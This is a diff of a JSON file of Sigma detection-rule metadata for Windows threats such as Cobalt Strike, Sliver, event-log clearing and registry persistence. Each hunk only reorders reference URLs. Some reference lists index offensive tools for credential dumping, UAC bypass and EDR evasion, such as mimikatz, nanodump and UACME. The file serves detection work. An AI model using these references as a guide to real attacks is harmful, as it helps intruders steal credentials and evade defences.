"logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://www.sans.org/webcasts/119395", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", + "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_cobaltstrike_service_installs.yml" ], "tags": [ @@ -13539,8 +13539,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml" ], "tags": [ @@ -13823,8 +13823,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml" ], "tags": [ @@ -13882,8 +13882,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml" ], "tags": [ @@ -14368,8 +14368,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml" ], "tags": [ @@ -14404,8 +14404,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://twitter.com/deviouspolack/status/832535435960209408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml" ], "tags": [ @@ -14584,9 +14584,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml" ], "tags": [ @@ -14619,9 +14619,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml" ], "tags": [ @@ -14945,8 +14945,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", + "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_client/win_dns_client__mal_cobaltstrike.yml" ], "tags": [ @@ -14979,9 +14979,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker", + "https://nxlog.co/documentation/nxlog-user-guide/applocker.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml" ], "tags": [ @@ -15052,11 +15052,11 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", - "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c", "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1", "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs", + "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726", + "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml" ], "tags": [ @@ -15105,9 +15105,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml" ], @@ -15131,9 +15131,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml" ], @@ -15157,9 +15157,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml" ], @@ -15183,9 +15183,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "Internal Research", - "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "Internal Research", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml" ], @@ -15209,8 +15209,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_policy_block.yml" ], "tags": [ @@ -15233,9 +15233,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", + "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml" ], "tags": [ @@ -15258,8 +15258,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting", + "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml" ], "tags": [ @@ -15513,8 +15513,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" ], "tags": [ @@ -15547,8 +15547,8 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1659175181695287297", "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/", + "https://twitter.com/cyb3rops/status/1659175181695287297", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml" ], "tags": [ @@ -15572,8 +15572,8 @@ "logsource.product": "windows", "refs": [ "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml" ], "tags": [ @@ -15607,17 +15607,17 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://github.com/codewhitesec/HandleKatz", - "https://github.com/hfiref0x/UACME", - "https://www.tarasco.org/security/pwdump_7/", - "https://github.com/wavestone-cdt/EDRSandblast", - "https://github.com/antonioCoco/RoguePotato", - "https://github.com/gentilkiwi/mimikatz", - "https://github.com/fortra/nanodump", "https://github.com/xuanxuan0/DripLoader", - "https://github.com/ohpe/juicy-potato", + "https://github.com/antonioCoco/RoguePotato", "https://github.com/outflanknl/Dumpert", + "https://www.tarasco.org/security/pwdump_7/", + "https://github.com/ohpe/juicy-potato", + "https://github.com/codewhitesec/HandleKatz", "https://github.com/topotam/PetitPotam", + "https://github.com/gentilkiwi/mimikatz", + "https://github.com/hfiref0x/UACME", + "https://github.com/wavestone-cdt/EDRSandblast", + "https://github.com/fortra/nanodump", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_hktl_generic_download.yml" ], "tags": [ @@ -15675,10 +15675,10 @@ "logsource.category": "create_stream_hash", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml" ], "tags": [ @@ -15945,8 +15945,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", + "https://www.dfirnotes.net/portproxy_detection/", "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" ], @@ -15983,8 +15983,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", - "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://persistence-info.github.io/Data/recyclebin.html", + "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" ], "tags": [ @@ -16017,8 +16017,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1183745981189427200", "https://blog.xpnsec.com/exploring-mimikatz-part-1/", + "https://twitter.com/SBousseaden/status/1183745981189427200", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml" ], "tags": [ @@ -16087,8 +16087,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://nvd.nist.gov/vuln/detail/cve-2021-34527", "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", + "https://nvd.nist.gov/vuln/detail/cve-2021-34527", "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", "https://nvd.nist.gov/vuln/detail/cve-2021-1675", @@ -16159,9 +16159,9 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", + "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml" ], "tags": [ @@ -16467,8 +16467,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/eset/malware-ioc/tree/master/oceanlotus", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" ], "tags": [ @@ -16501,8 +16501,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", + "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" ], "tags": [ @@ -16577,8 +16577,8 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" ], "tags": [ @@ -16985,10 +16985,10 @@ "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", - "https://github.com/hfiref0x/UACME", + "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" ], "tags": [ @@ -17131,9 +17131,9 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", - "http://woshub.com/how-to-clear-rdp-connections-history/", "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", + "http://woshub.com/how-to-clear-rdp-connections-history/", + "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" ], "tags": [ @@ -17307,11 +17307,11 @@ "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md", + "https://github.com/OTRF/detection-hackathon-apt29/issues/7", "https://docs.microsoft.com/en-us/windows/win32/shell/launch", "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://github.com/OTRF/detection-hackathon-apt29/issues/7", + "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ @@ -17469,11 +17469,11 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ + "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", + "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", - "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/", "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing", - "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_netwire.yml" ], "tags": [ @@ -17539,8 +17539,8 @@ "logsource.category": "registry_add", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/amsi.html", "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + "https://persistence-info.github.io/Data/amsi.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml" ], "tags": [ @@ -17630,8 +17630,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/", + "https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml" ], "tags": [ @@ -17706,9 +17706,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", "https://twitter.com/Hexacorn/status/991447379864932352", - "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ @@ -17841,8 +17841,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", "https://persistence-info.github.io/Data/htmlhelpauthor.html", + "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml" ], "tags": [ @@ -17922,8 +17922,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://twitter.com/0gtweet/status/1674399582162153472", + "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml" ], "tags": [ @@ -17996,8 +17996,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048", "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44", + "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" ], "tags": [ @@ -18097,11 +18097,11 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/", + "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6", "https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN", - "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", + "https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml" ], "tags": [ @@ -18134,8 +18134,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" ], "tags": [ @@ -18160,8 +18160,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml" ], "tags": [ @@ -18194,13 +18194,13 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", + "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", "https://web.archive.org/web/20200929062532/https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html", "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", + "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html", "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services", - "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03", + "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml" ], "tags": [ @@ -18293,8 +18293,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", + "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" ], "tags": [ @@ -18335,8 +18335,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://persistence-info.github.io/Data/wer_debugger.html", "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", + "https://persistence-info.github.io/Data/wer_debugger.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" ], "tags": [ @@ -18575,8 +18575,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://vanmieghem.io/stealth-outlook-persistence/", "https://twitter.com/_vivami/status/1347925307643355138", + "https://vanmieghem.io/stealth-outlook-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" ], "tags": [ @@ -18612,8 +18612,8 @@ "refs": [ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - 